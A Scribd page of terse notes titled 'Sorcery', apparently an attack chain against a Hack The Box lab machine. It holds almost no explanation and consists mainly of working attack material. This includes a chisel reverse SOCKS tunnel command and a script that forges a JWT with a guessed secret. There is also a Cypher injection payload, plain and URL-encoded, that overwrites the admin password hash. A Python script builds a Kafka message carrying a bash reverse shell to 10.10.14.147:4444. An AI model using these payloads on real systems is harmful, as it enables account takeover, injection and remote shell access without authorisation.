Scribd
Upload
2K views4 pages

Sorcery

The document contains code snippets demonstrating the use of Argon2 for password hashing and JWT for token generation. It also includes a method for updating a user's password in a database and a packet construction for sending a command over TCP. Additionally, it features a command to start a chisel server for reverse tunneling.

Uploaded by

yummy.sempai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
2K views4 pages

Sorcery

The document contains code snippets demonstrating the use of Argon2 for password hashing and JWT for token generation. It also includes a method for updating a user's password in a database and a packet construction for sending a command over TCP. Additionally, it features a command to start a chisel server for reverse tunneling.

Uploaded by

yummy.sempai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

Sorcery

chisel server --port 8000 --reverse --socks5

└─$ echo -n "P@ssw0rd123" | argon2 somesalt -id -t 2 -m 15 -p 1


Type: Argon2id
Iterations: 2
Memory: 32768 KiB
Parallelism: 1
Hash: 4f09ef2131dea271795bb3ff1901f4b0bafeca7b561b82de21991deec345c701
Encoded: $argon2id$v=19$m=32768,t=2,p=1$c29tZXNhbHQ$TwnvITHeonF5W7P/GQH0sLr+yntWG4LeIZkd7sNFxwE
0.215 seconds
Verification ok

import jwt
import time

secret ="mysecretkey"

payload ={
"id":"13964762-e847-4351-9419-0cd43d57ef40",
"username":"eqnx",
"privilegeLevel":2,
"withPasskey":False,
"onlyForPaths":None,
"exp":int(time.time())+3600 # 1 hour expiry
}

token = jwt.encode(payload, secret, algorithm="HS256")


print(token)

{"keys":[{"alg":"RS256","e":"AQAB","kid":"mVZr-LKwH47bS_z5ecsImD-
juQyGAUe2gZd8lfmm15s","kty":"RSA","n":"ya32OuZSjWgNIBldxvH28APu_ZQkEw8-oAWwIEFI-LopkDll3b-
anY0ZROJutYVZpFowPU7D6Sq4q2fJDMyPLGdOe6Tc8wEewpnRYfIesPXLeVhV5e5ucDX4kwpImiAvdGPxgFc_P7prnVZj1FhvHHsDHsdnSGyCNd
l3jsHERol_eCHLYBRg2_pp7mSoxAjFuSdwjPlBTcdrNB0mcgRw9XsXbYziGQkIgWpHROCm-
43CiEwk89jju8JNleaEdEXOvi6ias6dXYhbTsAMpiQdMbQ4Ns5jFKegsxAuIAQ_U1PzWswR8x3zVc6kV1LksCzt0M--
pLP05Jbo86GEO7Cvz1HjMIXOW70HCOewXI-
DmHHSfSuKYREFlBi73_RdXIeKvAsmb7ERmCtBmkFf9D2vZdD7T1a5ssuxyI89VaqqwivR_o0a75ne7kbtUdJSoBTm7ZyAqTOyyB3rxbV1hE-
5tLIxiqnHLidVljZiU68dSFIaAW0NvGPa7HFL-ghN3jrseYaqsCgwEqltv9JB-yy0FcM-
Sv5fwZ_tfCVIxGs7D_DArCsxg6KIItviUDOkTTOEpSeCEfqhp9C2giGgcz4UONbDTRB7BdpP49NH6vp5J2aJwA7zhHX9btTqqebp7GKKUEanTdU
lZmaj5MlrneRv6CJpYXrHz0nPHn3UiCj_4Vc","use":"sig"}]}

echo -n "P@ssw0rd123" | argon2 somesalt -id -t 2 -m 15 -p 1


"}) WITH result MATCH (u:User {username: 'admin'}) SET u.password =
'$argon2id$v=19$m=32768,t=2,p=1$c29tZXNhbHQ$TwnvITHeonF5W7P/GQH0sLr+yntWG4LeIZkd7sNFxwE' RETURN result { .*,
description: 'admin password updated' } //

https://sorcery.htb/dashboard/store/88b6b6c5-a614-486c-9d51-d255f47efb4f

~]
└─$ python3 try1.py
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjEzOTY0NzYyLWU4NDctNDM1MS05NDE5LTBjZDQzZDU3ZWY0MCIsInVzZXJuYW1lIj
oiZXFueCIsInByaXZpbGVnZUxldmVsIjoyLCJ3aXRoUGFzc2tleSI6ZmFsc2UsIm9ubHlGb3JQYXRocyI6bnVsbCwiZXhwIjoxNzUwMzY1Nzgwf
Q.k0DaHIhGVjSb0-f9m-zI8b8x-hwNb1HxrevnKTvkLmU

%22%7D%29%20WITH%20result%20MATCH%20%28u%3AUser%20%7Busername%3A%20%27admin%27%7D%29%20SET%20u.password%20%3D%2
0%27%24argon2id%24v%3D19%24m%3D32768%2Ct%3D2%2Cp%3D1%24c29tZXNhbHQ%24TwnvITHeonF5W7P%2FGQH0sLr%2ByntWG4LeIZkd7s
NFxwE%27%20RETURN%20result%20%7B%20.%2A%2C%20description%3A%20%27admin%20password%20updated%27%20%7D%20%2F%2F
import struct, zlib, binascii

topic = b"update"
value = b"bash -c 'sh -i >& /dev/tcp/10.10.14.147/4444 0>&1'"

def msg(v):
body = struct.pack(">BBi", 0, 0, -1) \
+ struct.pack(">i", len(v)) \
+ v

crc = zlib.crc32(body) & 0xffffffff


# <-- pack as unsigned 32-bit
return struct.pack(">I", crc) + body

mset = struct.pack(">q", 0) \
+ struct.pack(">i", len(msg(value))) \
+ msg(value)

pdata = struct.pack(">i", 0) \
+ struct.pack(">i", len(mset)) \
+ mset
tdata = struct.pack(">h", len(topic)) \
+ topic \
+ struct.pack(">i", 1) \
+ pdata

body = struct.pack(">h", 1) \
+ struct.pack(">i", 10000) \
+ struct.pack(">i", 1) \
+ tdata

hdr = struct.pack(">hhih", 0, 0, 42, 3) + b"dbg"

pkt = struct.pack(">i", len(hdr) + len(body)) + hdr + body

print(pkt.hex())

You might also like